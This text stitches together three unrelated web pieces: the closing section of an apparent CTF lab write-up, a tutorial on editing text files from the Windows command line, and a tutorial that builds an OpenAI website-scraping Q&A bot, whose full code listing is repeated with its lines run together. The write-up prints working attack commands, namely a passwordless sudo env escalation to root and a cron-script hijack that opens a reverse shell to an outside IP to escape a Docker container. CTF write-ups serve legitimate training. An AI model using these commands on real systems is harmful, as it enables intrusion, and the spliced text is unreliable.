We manually enumerate the filesystem and discover the second flag at /var/www/flag2_QMW7JvaY2LvK.txt

Using the command find can help us quickly scan the filesystem for any files which contain the word β€œflag”.

find / -type f -name '*flag*' 2>/dev/null
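If find isn’t cooperating — say, from a limited shell with Python available — the same sweep can be sketched in a few lines (shown against a directory of your choice rather than / so it is safe to try anywhere):

```python
import os

def find_flags(root="."):
    """Return paths of all files under `root` whose name contains 'flag'."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        # os.walk descends recursively, like `find -type f`
        hits += [os.path.join(dirpath, f) for f in files if "flag" in f]
    return hits
```

For example, find_flags("/var/www") would have turned up the second flag here.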

We found the second flag in plaintext!

cat flag2_QMW7JvaY2LvK.txt
THM{LFβ€”------------ommittedβ€”-------fb}

CHECK SUDO PERMISSIONS

Let’s check out our sudo permissions with the command:

sudo -l
Matching Defaults entries for www-data on 26e23794a52b:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 26e23794a52b:
    (root) NOPASSWD: /usr/bin/env

EXPLOIT/PRIVILEGE ESCALATION

Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:

$ sudo env /bin/bash

Now we can verify that we are root with the command whoami.

GRAB THE THIRD FLAG 

cd /root
ls
flag3.txt
cat flag3.txt
THM{D1β€”------------ommittedβ€”-------12}

POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER

Let’s start up a new listener to catch the new bash shell outside of the container.

nc -lnvp 3333

We notice that there is a backup.sh that regularly runs on a schedule via cronjobs. Because this file is run by root outside of the docker container, we can hijack it by changing its contents to throw a revshell.

echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{escβ€”------------ommittedβ€”-------2d}

FINAL THOUGHTS

This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold.

Once we secured a revshell, the rest of the box went pretty quickly.

The final step of breaking out of a docker container with a second revshell was the sneakiest part for me.

The PHP directory traversal, combined with a PHP filter to base64-encode the output, was also a cool way to evade the data sanitization measures in place on the backend.


5 Easy Ways to Edit a Text File From Command Line (Windows)


Problem Formulation

Given is a text file, say my_file.txt. How to modify its content in your Windows command line working directory?

I’ll start with the most direct method to solve this problem in 90% of cases and give a more “pure” in-terminal method afterward.

Method 1: Using Notepad

The easiest way to edit a text file in the command line (CMD) on your Windows machine is to run the command notepad.exe my_text_file.txt, or simply notepad my_text_file.txt, in your cmd to open the text file with the visual editor Notepad.

notepad.exe my_file.txt

You can also skip the .exe prefix in most cases:

notepad my_text_file.txt

Now, you may ask:

πŸ’‘ Is Notepad preinstalled in any Windows installation? The answer is: yes! Notepad is a generic text editor to create, open, and read plaintext files and it’s included with all Windows versions.

Here’s how that looks on my Win 10 machine:

When I type in the command notepad.exe my_text_file.txt, CMD starts the Notepad visual editor in a new window.

I can then edit the file and hit CTRL + S to save the new contents.

But what if you cannot open a text editor—e.g. if you’re logged into a remote server via SSH?

Method 2: Pure CMD Approach

If you cannot open Notepad or other visual editors for some reason, a simple way to overwrite a text file with built-in Windows command line tools is the following:

  • Run the command echo 'your new content' > my_file.txt to print the new content using echo and redirect the output into the text file my_file.txt using >.
  • Check the new content using the command type my_file.txt.
C:\Users\xcent\Desktop>echo 'hello world' > my_file.txt

C:\Users\xcent\Desktop>type my_file.txt
'hello world'

Here’s what this looks like on my Windows machine, where I changed my_file.txt to contain the text 'hello world':

This is a simple and straightforward approach for small changes. However, if you have a large file and you just want to edit some minor details, this is not the best way.
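For minor edits to a bigger file, a tiny Python script can patch just the detail you care about without retyping everything — a minimal sketch, reusing the my_file.txt name from above:

```python
from pathlib import Path

path = Path("my_file.txt")
path.write_text("hello world\nsecond line\n")  # create a sample file to edit

# Read everything, change one detail, write the result back
text = path.read_text()
path.write_text(text.replace("hello", "goodbye"))

print(path.read_text())
```

Save it as patch.py next to the file and run python patch.py from the same CMD window.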

Method 3: Change File Purely In CMD (Copy Con)

If you need a full-fledged solution to edit potentially large files in your Windows CMD, use this method! πŸ‘‡

To create a new file in Windows command prompt, enter copy con followed by the target file name (copy con my_file.txt). Then enter the text you want to put in the file. To end and save the file, press Ctrl+Z then Enter or F6 then Enter.

copy con my_file.txt

How this looks on my Win machine:

A couple of notes:

πŸ’‘ Info: To edit an existing file, display the text by using the type command followed by the file name. Then copy and paste the text into the copy con command to make changes. Be careful not to make any typos, or you’ll have to start over again. Backspace works if you catch the mistake before pressing Enter. Note that this method may not work in PowerShell or other command line interfaces that don’t support this feature.

Method 4: If you SSH’d to a Unix Machine

Of course, if you have logged into a Unix-based machine, you usually don’t need to install any editor, because most systems ship with powerful terminal editors such as vim (and often emacs).

One of the following three commands should open your file in a terminal-based editing mode:

vim my_text_file.txt
vi my_text_file.txt
emacs my_text_file.txt

You can learn more about Vim here.

Summary

To edit a file.txt in the command line, use the command notepad file.txt to open a graphical editor on Windows.

If you need a simple file edit in your terminal without a graphical editor and without installation, you can use the command echo 'new content' > file.txt that overwrites the old content in file.txt with new content.

If you need a more direct in-CMD text editor run copy con file.txt to open the file in editing mode.

If you’re SSH’d into a Unix machine, running the Vim console-based editor may be the best idea. Use vim file.txt or vi file.txt to open it.

Feel free to join our email coding academy (it’s free):

πŸ‘‰ Recommended: How to Edit a Text File in PowerShell (Windows)


Building a Q&A Bot with OpenAI: A Step-by-Step Guide to Scraping Websites and Answering Questions


Have you ever found yourself deep in the internet rabbit hole, searching for an answer to a question that just won’t quit?

It can be frustrating to sift through all the online information and still come up empty-handed. But what if there was a way to get accurate and reliable answers in a snap? Enter the Q&A bot – your new best friend for all your pressing questions!

βœ… In this blog, we will take you on a wild ride to show you how to build your very own Q&A bot using OpenAI’s language models. We’ll guide you through the process of scraping text from a website, processing it, and using OpenAI’s language models to find the answers you seek.

And let’s face it, who doesn’t love having a robot friend that can answer all their burning questions? So buckle up and let’s build a quirky, lovable Q&A bot together!

You can check out the whole code project on GitHub (OpenAI Cookbook). I’ll explain the steps in the following sections.

Overview

This tutorial presents a Python script that

  • crawls a website,
  • extracts the text from the webpages,
  • tokenizes the text, and
  • creates embeddings for each text (quick explanation on “embeddings” below).

It then uses OpenAI’s API to answer questions based on the embeddings of the text.
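Quick explanation on β€œembeddings”: an embedding is just a vector of floats, and the trick is that semantically similar texts get nearby vectors. A toy illustration with made-up three-dimensional vectors (real ada-002 embeddings have 1536 dimensions):

```python
import numpy as np

def cosine_similarity(a, b):
    # 1.0 = pointing in the same direction, near 0.0 = unrelated
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

doc       = np.array([0.1, 0.9, 0.0])  # made-up embedding of a document chunk
question  = np.array([0.2, 0.8, 0.1])  # made-up embedding of a related question
unrelated = np.array([0.9, 0.0, 0.1])  # made-up embedding of unrelated text

print(cosine_similarity(doc, question) > cosine_similarity(doc, unrelated))  # → True
```

The script below ranks text chunks by exactly this kind of distance to pick the best context for a question.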

You will need to create your own API key in case you want to try it yourself.

πŸ‘‰ Recommended: OpenAI API – or How I Made My Python Code Intelligent

You should also install the openai library — I’ve written a blog tutorial on this too:

πŸ‘‰ Recommended: How to Install OpenAI in Python?

Scroll down to the whole code section if you want to try it by copy&paste.

Step 1

This section of the code imports the necessary Python libraries for the script:

  • requests – sending HTTP requests
  • re – regular expressions
  • urllib.request – opening URLs
  • BeautifulSoup – parsing HTML and XML
  • deque – creating a queue
  • HTMLParser – parsing HTML
  • urlparse – parsing URLs
  • os – interacting with the operating system
  • pandas – working with dataframes
  • tiktoken – getting a tokenizer
  • openai – creating embeddings and answering questions

################################################################################
### Step 1
################################################################################

import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity

# Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+'

# Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/"

# Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser):
    def __init__(self):
        super().__init__()
        # Create a list to store the hyperlinks
        self.hyperlinks = []

    # Override the HTMLParser's handle_starttag method to get the hyperlinks
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)

        # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks
        if tag == "a" and "href" in attrs:
            self.hyperlinks.append(attrs["href"])

Step 2

This section of the code defines a function called get_hyperlinks that takes a URL as input, tries to open the URL and read the HTML, and then parses the HTML to get hyperlinks. If the response is not HTML, it returns an empty list.

################################################################################
### Step 2
################################################################################

# Function to get the hyperlinks from a URL
def get_hyperlinks(url):
    # Try to open the URL and read the HTML
    try:
        # Open the URL and read the HTML
        with urllib.request.urlopen(url) as response:
            # If the response is not HTML, return an empty list
            if not response.info().get('Content-Type').startswith("text/html"):
                return []
            # Decode the HTML
            html = response.read().decode('utf-8')
    except Exception as e:
        print(e)
        return []

    # Create the HTML Parser and then parse the HTML to get hyperlinks
    parser = HyperlinkParser()
    parser.feed(html)

    return parser.hyperlinks

Step 3

This section of the code defines a function called get_domain_hyperlinks that takes a domain and a URL as input and returns a list of hyperlinks from the URL that are within the same domain. If the hyperlink is a URL, it checks if it is within the same domain. If the hyperlink is not a URL, it checks if it is a relative link.

################################################################################
### Step 3
################################################################################

# Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url):
    clean_links = []
    for link in set(get_hyperlinks(url)):
        clean_link = None

        # If the link is a URL, check if it is within the same domain
        if re.search(HTTP_URL_PATTERN, link):
            # Parse the URL and check if the domain is the same
            url_obj = urlparse(link)
            if url_obj.netloc == local_domain:
                clean_link = link

        # If the link is not a URL, check if it is a relative link
        else:
            if link.startswith("/"):
                link = link[1:]
            elif link.startswith("#") or link.startswith("mailto:"):
                continue
            clean_link = "https://" + local_domain + "/" + link

        if clean_link is not None:
            if clean_link.endswith("/"):
                clean_link = clean_link[:-1]
            clean_links.append(clean_link)

    # Return the list of hyperlinks that are within the same domain
    return list(set(clean_links))

Step 4

This section of the code defines a function called crawl that takes a URL as input, parses the URL to get the domain, creates a queue to store the URLs to crawl, creates a set to store the URLs that have already been seen (no duplicates), and creates a directory to store the text files. It then continues crawling until the queue is empty, saving the text from each URL to a text file, and getting the hyperlinks from each URL and adding them to the queue.

################################################################################
### Step 4
################################################################################

def crawl(url):
    # Parse the URL and get the domain
    local_domain = urlparse(url).netloc

    # Create a queue to store the URLs to crawl
    queue = deque([url])

    # Create a set to store the URLs that have already been seen (no duplicates)
    seen = set([url])

    # Create a directory to store the text files
    if not os.path.exists("text/"):
        os.mkdir("text/")

    if not os.path.exists("text/" + local_domain + "/"):
        os.mkdir("text/" + local_domain + "/")

    # Create a directory to store the csv files
    if not os.path.exists("processed"):
        os.mkdir("processed")

    # While the queue is not empty, continue crawling
    while queue:
        # Get the next URL from the queue
        url = queue.pop()
        print(url)  # for debugging and to see the progress

        # Save text from the url to a <url>.txt file
        with open('text/' + local_domain + '/' + url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f:
            # Get the text from the URL using BeautifulSoup
            soup = BeautifulSoup(requests.get(url).text, "html.parser")

            # Get the text but remove the tags
            text = soup.get_text()

            # If the crawler gets to a page that requires JavaScript, it will stop the crawl
            if ("You need to enable JavaScript to run this app." in text):
                print("Unable to parse page " + url + " due to JavaScript being required")

            # Otherwise, write the text to the file in the text directory
            f.write(text)

        # Get the hyperlinks from the URL and add them to the queue
        for link in get_domain_hyperlinks(local_domain, url):
            if link not in seen:
                queue.append(link)
                seen.add(link)

crawl(full_url)

Step 5

This section of the code defines a function called remove_newlines that takes a pandas Series object as input, replaces newlines with spaces, and returns the modified Series.

################################################################################
### Step 5
################################################################################

def remove_newlines(serie):
    serie = serie.str.replace('\n', ' ')
    serie = serie.str.replace('\\n', ' ')
    serie = serie.str.replace('  ', ' ')
    serie = serie.str.replace('  ', ' ')
    return serie

Step 6

This section of the code creates a list called texts to store the text files, gets all the text files in the text directory, opens each file, reads the text, strips the first 11 and last 4 characters of the filename (the saved domain prefix and the .txt suffix), replaces -, _, and #update with spaces, and appends the modified text to the list of texts. It then creates a dataframe from the list of texts, sets the text column to be the raw text with the newlines removed, and saves the dataframe as a CSV file.

################################################################################
### Step 6
################################################################################

# Create a list to store the text files
texts = []

# Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"):
    # Open the file and read the text
    with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f:
        text = f.read()
        # Strip the first 11 and last 4 characters of the filename, then replace -, _, and #update with spaces
        texts.append((file[11:-4].replace('-', ' ').replace('_', ' ').replace('#update', ''), text))

# Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns=['fname', 'text'])

# Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head()

Step 7

This section of the code loads a tokenizer and applies it to the text column of the dataframe to get the number of tokens for each row. It then creates a histogram of the number of tokens per row.

################################################################################
### Step 7
################################################################################

# Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base")

df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text']

# Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))

# Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist()

Step 8

This section of the code defines a maximum number of tokens, creates a function called split_into_many that takes text and a maximum number of tokens as input and splits the text into chunks of a maximum number of tokens.

It then loops through the dataframe and either adds the text to the list of shortened texts or splits the text into chunks of a maximum number of tokens and adds the chunks to the list of shortened texts.

################################################################################
### Step 8
################################################################################

max_tokens = 500

# Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens=max_tokens):
    # Split the text into sentences
    sentences = text.split('. ')

    # Get the number of tokens for each sentence
    n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences]

    chunks = []
    tokens_so_far = 0
    chunk = []

    # Loop through the sentences and tokens joined together in a tuple
    for sentence, token in zip(sentences, n_tokens):
        # If the number of tokens so far plus the number of tokens in the current sentence is greater
        # than the max number of tokens, then add the chunk to the list of chunks and reset
        # the chunk and tokens so far
        if tokens_so_far + token > max_tokens:
            chunks.append(". ".join(chunk) + ".")
            chunk = []
            tokens_so_far = 0

        # If the number of tokens in the current sentence is greater than the max number of
        # tokens, go to the next sentence
        if token > max_tokens:
            continue

        # Otherwise, add the sentence to the chunk and add the number of tokens to the total
        chunk.append(sentence)
        tokens_so_far += token + 1

    return chunks

shortened = []

# Loop through the dataframe
for row in df.iterrows():
    # If the text is None, go to the next row
    if row[1]['text'] is None:
        continue

    # If the number of tokens is greater than the max number of tokens, split the text into chunks
    if row[1]['n_tokens'] > max_tokens:
        shortened += split_into_many(row[1]['text'])

    # Otherwise, add the text to the list of shortened texts
    else:
        shortened.append(row[1]['text'])

Step 9

This section of the code creates a new dataframe from the list of shortened texts, applies the tokenizer to the text column of the dataframe to get the number of tokens for each row, and creates a histogram of the number of tokens per row.

################################################################################
### Step 9
################################################################################

df = pd.DataFrame(shortened, columns=['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist()

Step 10

Step 10 involves using OpenAI’s language model to embed the text into vectors. This allows the model to analyze the text and make predictions based on its content. The openai.Embedding.create() function is used to create the embeddings, and they are saved in a new column in the DataFrame.

################################################################################
### Step 10
################################################################################

# Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this:
# https://platform.openai.com/docs/guides/rate-limits

df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head()

Step 11

Step 11 involves loading the embeddings from the DataFrame and converting them to numpy arrays.

################################################################################
### Step 11
################################################################################

df = pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array)

df.head()

Step 12

Step 12 includes the create_context() and answer_question() functions that use the embeddings to find the most similar context to a question and then answer it based on that context. These functions leverage OpenAI’s language models and the embeddings created in Step 10 to provide accurate and reliable answers. The create_context() function creates the context based on the question and the embeddings, while the answer_question() function uses the context and question to generate a response using OpenAI’s GPT-3 language model.

################################################################################
### Step 12
################################################################################

def create_context(
    question, df, max_len=1800, size="ada"
):
    """
    Create a context for a question by finding the most similar context from the dataframe
    """

    # Get the embeddings for the question
    q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding']

    # Get the distances from the embeddings
    df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine')

    returns = []
    cur_len = 0

    # Sort by distance and add the text to the context until the context is too long
    for i, row in df.sort_values('distances', ascending=True).iterrows():
        # Add the length of the text to the current length
        cur_len += row['n_tokens'] + 4

        # If the context is too long, break
        if cur_len > max_len:
            break

        # Else add it to the text that is being returned
        returns.append(row["text"])

    # Return the context
    return "\n\n###\n\n".join(returns)


def answer_question(
    df,
    model="text-davinci-003",
    question="Am I allowed to publish model outputs to Twitter, without a human review?",
    max_len=1800,
    size="ada",
    debug=False,
    max_tokens=150,
    stop_sequence=None
):
    """
    Answer a question based on the most similar context from the dataframe texts
    """
    context = create_context(
        question,
        df,
        max_len=max_len,
        size=size,
    )
    # If debug, print the raw model response
    if debug:
        print("Context:\n" + context)
        print("\n\n")

    try:
        # Create a completion using the question and context
        response = openai.Completion.create(
            prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:",
            temperature=0,
            max_tokens=max_tokens,
            top_p=1,
            frequency_penalty=0,
            presence_penalty=0,
            stop=stop_sequence,
            model=model,
        )
        return response["choices"][0]["text"].strip()
    except Exception as e:
        print(e)
        return ""

Step 13

Step 13 provides an example of using the answer_question() function to answer two different questions. The first question is a simple one, while the second question requires more specific knowledge. This example demonstrates the versatility of the Q&A bot and its ability to answer a wide range of questions.

################################################################################
### Step 13
################################################################################

print(answer_question(df, question="What day is it?", debug=False))

print(answer_question(df, question="What is our newest embeddings model?"))

Putting It All Together

You can check out the whole code project on GitHub, or simply copy and paste it from here:

################################################################################
### Step 1
################################################################################ import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
from openai.embeddings_utils import distances_from_embeddings
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity # Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+' # Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/" # Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser): def __init__(self): super().__init__() # Create a list to store the hyperlinks self.hyperlinks = [] # Override the HTMLParser's handle_starttag method to get the hyperlinks def handle_starttag(self, tag, attrs): attrs = dict(attrs) # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks if tag == "a" and "href" in attrs: self.hyperlinks.append(attrs["href"]) ################################################################################
### Step 2
################################################################################ # Function to get the hyperlinks from a URL
def get_hyperlinks(url): # Try to open the URL and read the HTML try: # Open the URL and read the HTML with urllib.request.urlopen(url) as response: # If the response is not HTML, return an empty list if not response.info().get('Content-Type').startswith("text/html"): return [] # Decode the HTML html = response.read().decode('utf-8') except Exception as e: print(e) return [] # Create the HTML Parser and then Parse the HTML to get hyperlinks parser = HyperlinkParser() parser.feed(html) return parser.hyperlinks ################################################################################
### Step 3
################################################################################ # Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url): clean_links = [] for link in set(get_hyperlinks(url)): clean_link = None # If the link is a URL, check if it is within the same domain if re.search(HTTP_URL_PATTERN, link): # Parse the URL and check if the domain is the same url_obj = urlparse(link) if url_obj.netloc == local_domain: clean_link = link # If the link is not a URL, check if it is a relative link else: if link.startswith("/"): link = link[1:] elif link.startswith("#") or link.startswith("mailto:"): continue clean_link = "https://" + local_domain + "/" + link if clean_link is not None: if clean_link.endswith("/"): clean_link = clean_link[:-1] clean_links.append(clean_link) # Return the list of hyperlinks that are within the same domain return list(set(clean_links)) ################################################################################
### Step 4
################################################################################ def crawl(url): # Parse the URL and get the domain local_domain = urlparse(url).netloc # Create a queue to store the URLs to crawl queue = deque([url]) # Create a set to store the URLs that have already been seen (no duplicates) seen = set([url]) # Create a directory to store the text files if not os.path.exists("text/"): os.mkdir("text/") if not os.path.exists("text/"+local_domain+"/"): os.mkdir("text/" + local_domain + "/") # Create a directory to store the csv files if not os.path.exists("processed"): os.mkdir("processed") # While the queue is not empty, continue crawling while queue: # Get the next URL from the queue url = queue.pop() print(url) # for debugging and to see the progress # Save text from the url to a <url>.txt file with open('text/'+local_domain+'/'+url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f: # Get the text from the URL using BeautifulSoup soup = BeautifulSoup(requests.get(url).text, "html.parser") # Get the text but remove the tags text = soup.get_text() # If the crawler gets to a page that requires JavaScript, it will stop the crawl if ("You need to enable JavaScript to run this app." in text): print("Unable to parse page " + url + " due to JavaScript being required") # Otherwise, write the text to the file in the text directory f.write(text) # Get the hyperlinks from the URL and add them to the queue for link in get_domain_hyperlinks(local_domain, url): if link not in seen: queue.append(link) seen.add(link) crawl(full_url) ################################################################################
### Step 5
################################################################################

def remove_newlines(serie):
    serie = serie.str.replace('\n', ' ')
    serie = serie.str.replace('\\n', ' ')
    serie = serie.str.replace('  ', ' ')
    serie = serie.str.replace('  ', ' ')
    return serie

################################################################################
### Step 6
################################################################################

# Create a list to store the text files
texts = []

# Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"):
    # Open the file and read the text
    with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f:
        text = f.read()
        # Omit the first 11 lines and the last 4 lines, then replace -, _, and #update with spaces.
        texts.append((file[11:-4].replace('-', ' ').replace('_', ' ').replace('#update', ''), text))

# Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns=['fname', 'text'])

# Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head()

################################################################################
### Step 7
################################################################################

# Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base")

df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text']

# Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))

# Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist()

################################################################################
### Step 8
################################################################################

max_tokens = 500

# Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens=max_tokens):

    # Split the text into sentences
    sentences = text.split('. ')

    # Get the number of tokens for each sentence
    n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences]

    chunks = []
    tokens_so_far = 0
    chunk = []

    # Loop through the sentences and tokens joined together in a tuple
    for sentence, token in zip(sentences, n_tokens):

        # If the number of tokens so far plus the number of tokens in the current sentence is greater
        # than the max number of tokens, then add the chunk to the list of chunks and reset
        # the chunk and tokens so far
        if tokens_so_far + token > max_tokens:
            chunks.append(". ".join(chunk) + ".")
            chunk = []
            tokens_so_far = 0

        # If the number of tokens in the current sentence is greater than the max number of
        # tokens, go to the next sentence
        if token > max_tokens:
            continue

        # Otherwise, add the sentence to the chunk and add the number of tokens to the total
        chunk.append(sentence)
        tokens_so_far += token + 1

    return chunks

shortened = []

# Loop through the dataframe
for row in df.iterrows():

    # If the text is None, go to the next row
    if row[1]['text'] is None:
        continue

    # If the number of tokens is greater than the max number of tokens, split the text into chunks
    if row[1]['n_tokens'] > max_tokens:
        shortened += split_into_many(row[1]['text'])

    # Otherwise, add the text to the list of shortened texts
    else:
        shortened.append(row[1]['text'])

################################################################################
### Step 9
################################################################################

df = pd.DataFrame(shortened, columns=['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist()

################################################################################
### Step 10
################################################################################

# Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this: https://platform.openai.com/docs/guides/rate-limits
df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head()

################################################################################
### Step 11
################################################################################

df = pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array)
df.head()

################################################################################
### Step 12
################################################################################

def create_context(
    question, df, max_len=1800, size="ada"
):
    """
    Create a context for a question by finding the most similar context from the dataframe
    """

    # Get the embeddings for the question
    q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding']

    # Get the distances from the embeddings
    df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine')

    returns = []
    cur_len = 0

    # Sort by distance and add the text to the context until the context is too long
    for i, row in df.sort_values('distances', ascending=True).iterrows():

        # Add the length of the text to the current length
        cur_len += row['n_tokens'] + 4

        # If the context is too long, break
        if cur_len > max_len:
            break

        # Else add it to the text that is being returned
        returns.append(row["text"])

    # Return the context
    return "\n\n###\n\n".join(returns)

def answer_question(
    df,
    model="text-davinci-003",
    question="Am I allowed to publish model outputs to Twitter, without a human review?",
    max_len=1800,
    size="ada",
    debug=False,
    max_tokens=150,
    stop_sequence=None
):
    """
    Answer a question based on the most similar context from the dataframe texts
    """
    context = create_context(
        question,
        df,
        max_len=max_len,
        size=size,
    )

    # If debug, print the raw model response
    if debug:
        print("Context:\n" + context)
        print("\n\n")

    try:
        # Create a completion using the question and context
        response = openai.Completion.create(
            prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:",
            temperature=0,
            max_tokens=max_tokens,
            top_p=1,
            frequency_penalty=0,
            presence_penalty=0,
            stop=stop_sequence,
            model=model,
        )
        return response["choices"][0]["text"].strip()
    except Exception as e:
        print(e)
        return ""

################################################################################
### Step 13
################################################################################

print(answer_question(df, question="What day is it?", debug=False))

print(answer_question(df, question="What is our newest embeddings model?"))

How to Run This Code?

This program is a Python script that scrapes text from a website, processes it, and then uses OpenAI’s language models to answer questions based on the scraped text.

All of the following explanations refer to the original code project on GitHub here.

Here’s a step-by-step guide on how to use it:

  1. Install the required packages: The script uses several Python packages, including requests, BeautifulSoup, pandas, and openai. You can install these packages by running pip install -r requirements.txt in the directory where the script is located.
  2. Set the website to scrape: In the script, you can specify the website to scrape by setting the domain and full_url variables in Step 1. The domain variable should be the root domain of the website (e.g., “example.com”), and the full_url variable should be the full URL of the website (e.g., “https://www.example.com/“).
  3. Run the script: You can run the script in a Python environment by executing python script.py in the directory where the script is located.
  4. Wait for the scraping to complete: The script will take some time to scrape the website and save the text files to disk. You can monitor the progress by looking at the console output.
  5. Ask questions: After the scraping is complete, you can use the answer_question function in Step 12 to ask questions based on the scraped text. The function takes in a dataframe containing the scraped text, a question to ask, and several optional parameters. You can modify the question and other parameters to suit your needs.
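
The configuration from step 2 can be sketched as follows. The domain and URL values are placeholders, and the helper function below simply mirrors the filename convention the crawler uses when it writes each page to disk (stripping the leading "https://", i.e. the first 8 characters, and replacing slashes with underscores):

```python
# Placeholder configuration -- replace with the site you want to scrape.
domain = "example.com"
full_url = "https://www.example.com/"

def page_filename(url: str) -> str:
    """Mirror the crawler's naming scheme: text/<domain>/<url>.txt."""
    # url[8:] drops the "https://" prefix; slashes become underscores.
    return url[8:].replace("/", "_") + ".txt"

print(page_filename(full_url))  # www.example.com_.txt
```

Note that `page_filename` is a hypothetical helper added here for illustration; the script performs the same transformation inline inside `crawl`.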

Note that the script is intended as a demonstration of how to use OpenAI’s language models to answer questions based on scraped text, and may require modification to work with different websites or to answer different types of questions. It also requires an OpenAI API key to use. You can sign up for an API key on the OpenAI website.

What Is an Embedding in This Context?

πŸ’‘ In natural language processing, an embedding is a way to represent words or phrases as numerical vectors. These vectors capture semantic and contextual information about the words and phrases, and can be used to train machine learning models for various tasks such as text classification, sentiment analysis, and question answering.

In this script, the embeddings are created using OpenAI’s language models, and they are used to encode the text from the scraped web pages into a numerical format that can be analyzed and searched efficiently.

The embeddings are created by feeding the text through OpenAI’s text-embedding-ada-002 engine, which is designed to create high-quality embeddings for a wide variety of text-based applications.

The resulting embeddings are stored in the DataFrame and used to find the most similar context to a question in order to provide accurate and reliable answers.
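
The "most similar context" lookup boils down to comparing embedding vectors by cosine distance, which is what `distances_from_embeddings` computes with `distance_metric='cosine'`. Here is a minimal, self-contained sketch of that idea using toy 3-dimensional vectors (real text-embedding-ada-002 vectors have 1536 dimensions):

```python
from math import sqrt

def cosine_distance(a, b):
    """Cosine distance = 1 - cosine similarity; smaller means more similar."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = sqrt(sum(x * x for x in a))
    norm_b = sqrt(sum(x * x for x in b))
    return 1.0 - dot / (norm_a * norm_b)

# Toy "embeddings" -- the real ones come from the OpenAI API:
question  = [1.0, 0.0, 0.0]
context_a = [0.9, 0.1, 0.0]   # points in almost the same direction
context_b = [0.0, 1.0, 0.0]   # orthogonal, i.e. semantically unrelated

# The closer context wins, exactly like the sort in create_context:
assert cosine_distance(question, context_a) < cosine_distance(question, context_b)
```

This is why sorting the DataFrame by `distances` in ascending order puts the most relevant text chunks at the top of the context.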

πŸ‘‰ Recommended: How to Install OpenAI in Python?

